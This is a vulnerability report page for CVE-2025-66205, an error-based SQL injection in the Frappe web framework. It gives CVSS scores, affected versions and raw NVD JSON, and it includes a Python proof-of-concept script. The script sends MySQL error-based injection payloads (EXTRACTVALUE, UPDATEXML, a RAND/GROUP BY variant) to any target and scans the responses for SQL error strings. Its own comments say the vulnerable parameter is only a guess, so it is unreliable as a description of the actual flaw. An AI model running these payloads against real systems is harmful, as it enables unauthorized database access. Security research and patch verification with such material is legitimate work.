Security Vulnerability Report
CVE-2025-66205 CVSS 7.1 HIGH

CVE-2025-66205

Published: 2025-12-01 21:15:52
Last Modified: 2025-12-04 18:49:13

Description

Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* - VULNERABLE
Frappe Framework < 15.86.0
Frappe Framework < 14.99.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-66205 SQL Injection PoC for Frappe Framework
# Target: Frappe versions < 15.86.0 and < 14.99.2


def exploit_sql_injection(target_url, endpoint):
    """Probe one Frappe endpoint for error-based SQL injection (CVE-2025-66205).

    Each candidate payload is sent as a form-encoded POST to
    ``target_url + endpoint``; the response body is then scanned for the
    strings in ``error_signatures``.  The first match ends the probe.

    Args:
        target_url: Scheme and host, e.g. ``http://host`` (the ``__main__``
            block strips a trailing ``/`` before passing it in).
        endpoint: Path that is appended verbatim to ``target_url``.

    Returns:
        True as soon as one response contains an error signature, False when
        every payload was sent without a match.

    Raises:
        ``requests.exceptions.RequestException`` is caught per payload and the
        next payload is tried; any other exception propagates.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Test payload - extract database version using error-based injection
    # This payload exploits the lack of parameter validation
    # All three are MySQL-dialect error-based probes; a Frappe site on a
    # different backend is not expected to respond to them.
    payloads = [
        "test' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--",
        "test' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)--",
        "test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--"
    ]

    print(f"[*] Testing target: {target_url}")
    print(f"[*] Target endpoint: {endpoint}")

    for i, payload in enumerate(payloads, 1):
        print(f"\n[+] Testing payload {i}/3...")
        print(f"[*] Payload: {payload}")

        try:
            # Adjust data parameter based on actual vulnerable parameter
            # NOTE(review): the advisory text above does not name the affected
            # parameter; 'cmd' / 'doctype' / 'name' are guesses — confirm
            # against the patch commit linked in the References section.
            data = {
                'cmd': payload,  # Common parameter in Frappe API
                'doctype': 'User',
                'name': 'Administrator'
            }

            # verify=False disables TLS certificate validation for this
            # request, so the probe traffic (and any credentials added to
            # headers later) can be read or altered in transit.  Keep it only
            # for lab targets with self-signed certificates.
            response = requests.post(
                f"{target_url}{endpoint}",
                data=data,
                headers=headers,
                timeout=10,
                verify=False
            )

            print(f"[*] Status Code: {response.status_code}")
            print(f"[*] Response Length: {len(response.text)}")

            # Check for SQL error signatures in response
            # Plain substring match: 'syntax' and 'SQL' also occur in ordinary
            # page text, so a hit is evidence, not proof ('SQL' already covers
            # every body that 'MySQL' / 'mysql' would).  The same strings are
            # what a defender's log or WAF rule for this class of probe can
            # key on.
            error_signatures = [
                'XPATH',
                'MySQL',
                'syntax',
                'SQL',
                'mysql',
                'You have an error in your SQL',
                'Warning: mysql',
                'sqlite3.OperationalError',
                'ProgrammingError'
            ]

            for signature in error_signatures:
                if signature in response.text:
                    print(f"[!] SQL Error detected: {signature}")
                    print(f"[!] Vulnerable to SQL Injection!")
                    print(f"\n[+] Partial response:")
                    print(response.text[:500])
                    # Only the first matching signature is reported; the
                    # remaining payloads are never sent.
                    return True

        except requests.exceptions.RequestException as e:
            # Connection / timeout / TLS errors do not abort the run.
            print(f"[!] Request failed: {e}")
            continue

    print("\n[-] No SQL injection detected with test payloads")
    return False


if __name__ == "__main__":
    # Two positional arguments are required: base URL and endpoint path.
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-66205_poc.py <target_url> <endpoint>")
        print("Example: python cve-2025-66205_poc.py http://vulnerable-site.com /api/method/endpoint")
        sys.exit(1)

    # Strip a trailing slash so the URL is joined without a double '/'.
    target = sys.argv[1].rstrip('/')
    endpoint = sys.argv[2]

    exploit_sql_injection(target, endpoint)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66205", "sourceIdentifier": "[email protected]", "published": "2025-12-01T21:15:52.443", "lastModified": "2025-12-04T18:49:12.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.99.2", "matchCriteriaId": "5F7C6678-1529-4C46-BF75-8647AF1170C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": 
"15.86.0", "matchCriteriaId": "63006503-DD78-47D9-ACDE-9D3480FAE9F6"}]}]}], "references": [{"url": "https://github.com/frappe/frappe/commit/984c641bff9539b6126a01146096f133db6a955b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/frappe/security/advisories/GHSA-mp93-8vxr-hqq9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}